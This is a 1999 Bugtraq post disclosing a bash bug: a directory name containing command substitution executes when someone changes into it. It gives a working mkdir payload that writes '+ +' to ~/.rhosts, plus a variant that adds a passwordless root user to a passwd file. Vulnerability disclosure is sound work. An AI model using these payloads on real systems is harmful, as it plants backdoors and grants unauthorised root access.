[10300] in bugtraq
Bash Bug
daemon@ATHENA.MIT.EDU (Shadow)
Wed Apr 21 19:56:10 1999
Date: Tue, 20 Apr 1999 21:25:47 -0400
Reply-To: Shadow <shadow@OPERATOR.ORG>
From: Shadow <shadow@OPERATOR.ORG>
To: BUGTRAQ@NETSPACE.ORG
Figured while everyone was working with bash, I might as well make this
one public(I apologize if this is old news, apparently it hasnt been fixed
if so).
If a user creates a directory with a command like
mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` "
and someone cd's into said directory, either by accident, or whatever,
then it will cause it to actually execute. I also did this with a passwd
file, echo a user such as r00t::0:0:\57root\57bin\57bash instead of + + to
the rhosts. Played with symlinks and a few other ways to see if perhaps
maybe the system could trip it if a user made the directory in say /tmp.
Granted it may be a long shot on the users part, the ability to do so is a
bad thing IMHO. This didnt seem to work on any of my BSD boxes.
shadow - CLE
-------------------------------------------------------------------------
Most Failure is due to giving up, not realizing how close to success you
were - Thomas Edison
-------------------------------------------------------------------------
